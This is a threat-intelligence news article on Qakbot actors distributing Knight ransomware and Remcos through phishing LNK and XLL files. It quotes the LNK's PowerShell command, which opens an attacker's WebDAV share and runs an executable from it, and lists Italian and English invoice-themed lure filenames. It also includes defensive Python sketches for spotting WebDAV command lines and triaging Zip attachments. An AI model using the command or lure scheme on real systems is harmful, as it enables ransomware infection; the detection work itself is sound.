Thursday, November 14, 2024

Qakbot Threat Actors Deliver Knight Ransomware & Remcos Via LNK Files


Qakbot’s infrastructure and cryptocurrency assets were seized by government authorities in an operation in August 2023 with the assistance of international allies, raising concerns about the affiliates of Qakbot.

Talos researchers assess with moderate confidence that Qakbot threat actors remain active and have launched a recent campaign distributing Cyclops/Ransom Knight ransomware and the Remcos backdoor. The campaign was tracked through LNK file metadata that connects it to past campaigns.

Talos researchers used LNK file metadata to trace threat actors, linking the “AA” and “BB” campaigns in January 2023. 


After their report, Qakbot actors in the “AA,” “BB,” and “Obama” campaigns began removing LNK file metadata to evade detection and tracking.


Technical analysis

In August 2023, Talos discovered new LNK files from the same system that lead to a network share containing the Ransom Knight ransomware. According to the analysis, the LNK files point to powershell.exe and pass it the following parameters for the subsequent download step:

  • -c "explorer '\\89[.]23[.]96[.]203@80\333\'"; Start-Sleep -Seconds 1; Stop-Process -Name explorer; \\89[.]23[.]96[.]203@80\333\information.exe

Running explorer.exe to open the remote IP 89[.]23[.]96[.]203 over WebDAV (port 80) might evade command-line detections that look for PowerShell downloading a remote executable (T1105).
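A detection sketch for the command line above, added here as an example and not taken from Talos or the original article: it flags the WebDAV form of a UNC path (`\\host@port\...`) in process command lines, and goes beyond the `@80` case to cover the `@SSL` and `@SSL@443` suffixes as well. The rule names, the extension list and the sample command lines (which use documentation addresses) are assumptions.

```python
import re

# WebDAV redirector UNC form: \\host@80\..., \\host@SSL\..., \\host@SSL@443\...
WEBDAV_UNC = re.compile(
    r"\\\\(?P<host>[^\\@\s'\"]+)@(?P<suffix>ssl(?:@\d{1,5})?|\d{1,5})"
    r"\\(?P<path>[^\s'\";]*)", re.IGNORECASE)
# Assumed lists; tune them to the environment.
EXEC_EXT = (".exe", ".dll", ".xll", ".scr", ".bat", ".cmd", ".ps1", ".vbs", ".hta", ".msi")
SCRIPT_HOSTS = ("powershell", "pwsh", "cmd.exe", "wscript", "cscript", "mshta")

def webdav_findings(command_line):
    """Return the sorted names of the rules that fire for one process command line."""
    hits = list(WEBDAV_UNC.finditer(command_line))
    if not hits:
        return []
    lowered = command_line.lower()
    rules = {"webdav_unc_in_cmdline"}
    # A binary or script addressed directly on the WebDAV share.
    if any(m.group("path").lower().endswith(EXEC_EXT) for m in hits):
        rules.add("executable_on_webdav_share")
    # Explorer opens the share on behalf of a script host, so no download cmdlet
    # or URL appears on the command line: the evasion described above.
    if any(h in lowered for h in SCRIPT_HOSTS) and re.search(r"\bexplorer(\.exe)?\b", lowered):
        rules.add("explorer_opens_webdav_from_script_host")
    return sorted(rules)

# Constructed sample command lines (192.0.2.10 is a documentation address).
SAMPLES = {
    "lnk_style": r"""powershell.exe -c "explorer '\\192.0.2.10@80\333\'"; """
                 r"""Start-Sleep -Seconds 1; Stop-Process -Name explorer; """
                 r"""\\192.0.2.10@80\333\information.exe""",
    "mapped_drive": r"net use Z: \\files.example.internal@SSL@443\team",
    "plain_smb": r"C:\Windows\explorer.exe \\fileserver\public",
}

if __name__ == "__main__":
    for label, cmd in SAMPLES.items():
        print(label, webdav_findings(cmd))
```

The `mapped_drive` sample shows why the bare UNC rule alone is noisy where WebDAV shares are in legitimate use; the two narrower rules are the ones worth alerting on.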

The LNK filenames hint at urgent financial topics, which suggests they are delivered through phishing, as in earlier Qakbot campaigns. The filenames of the LNK files are:

  • ATTENTION-Invoice-29-August.docx.lnk
  • bank transfer request.lnk
  • Booking info.pdf.lnk
  • Fattura NON pagata Agosto 2023.docx.lnk
  • FRAUD bank transfer report.pdf.lnk
  • invoice OTP bank.pdf.lnk
  • MANDATORY-Invoice-28-August.docx.lnk
  • NOT-paid-Invoice-26-August.pdf.lnk
  • Nuove coordinate bancarie e IBAN 2023.docx.lnk
  • Nuove coordinate bancarie e IBAN 2023.img.lnk
  • Pay-Invoices-29-August.pdf.lnk
  • URGENT-Invoice-27-August.docx.lnk

The Italian filenames hint at regional targeting. The LNK files are distributed inside Zip archives that also contain XLL files, an extension typically associated with Excel add-ins and shown with a similar icon.
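An attachment triage sketch for the delivery pattern just described, added as an example and not part of the original article or of Talos's tooling: it inspects only the entry names of a Zip archive and reports LNK files with a decoy document extension, financial lure words, and an XLL add-in shipped alongside. The verdict names, the decoy extension list and the non-LNK sample entries are assumptions.

```python
import io
import zipfile
from pathlib import PurePosixPath

DECOY_EXTS = {".pdf", ".docx", ".doc", ".xlsx", ".img", ".jpg"}  # assumed decoy list
LURE_WORDS = ("invoice", "fattura", "bank", "iban", "urgent")    # taken from the lure names above

def triage_zip(data):
    """Classify a Zip attachment by entry names only; nothing is extracted or run."""
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        names = [n for n in zf.namelist() if not n.endswith("/")]
    reasons = {}
    for name in names:
        suffixes = [s.lower() for s in PurePosixPath(name).suffixes]
        found = []
        if suffixes[-1:] == [".lnk"]:
            found.append("lnk_in_archive")
            # "report.pdf.lnk" displays as "report.pdf" because Windows hides .lnk.
            if len(suffixes) > 1 and suffixes[-2] in DECOY_EXTS:
                found.append("decoy_double_extension")
            if any(w in name.lower() for w in LURE_WORDS):
                found.append("financial_lure_name")
        elif suffixes[-1:] == [".xll"]:
            found.append("xll_addin_in_archive")
        if found:
            reasons[name] = found
    flat = {r for rs in reasons.values() for r in rs}
    if "lnk_in_archive" in flat and flat & {"decoy_double_extension", "xll_addin_in_archive"}:
        verdict = "quarantine"
    elif flat:
        verdict = "review"
    else:
        verdict = "allow"
    return {"verdict": verdict, "reasons": reasons}

def make_zip(names):
    """Build an in-memory Zip with placeholder contents (constructed sample input)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for name in names:
            zf.writestr(name, b"placeholder")
    return buf.getvalue()

# Constructed samples: the .lnk names come from the list above, the rest are made up.
SAMPLE_BAD = make_zip(["Fattura NON pagata Agosto 2023.docx.lnk", "Fattura.xll"])
SAMPLE_LNK_ONLY = make_zip(["bank transfer request.lnk"])
SAMPLE_OK = make_zip(["minutes.docx", "photos/team.jpg"])
```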

The LNK file fetches the Ransom Knight payload from the remote IP 89[.]23[.]96[.]203 via WebDAV. Ransom Knight is an evolved version of the Cyclops ransomware, announced by its operator in May 2023.

Experts suggest that Qakbot threat actors are customers, not operators, of the ransomware service. The FBI operation in August 2023 mainly targeted control servers, leaving email delivery unaffected. 

While Qakbot distribution paused post-takedown, the threat could resurge if the operators rebuild their infrastructure.


Tushar Subhra
Tushar is a Cyber security content editor with a passion for creating captivating and informative content. With years of experience under his belt in Cyber Security, he is covering Cyber Security News, technology and other news.
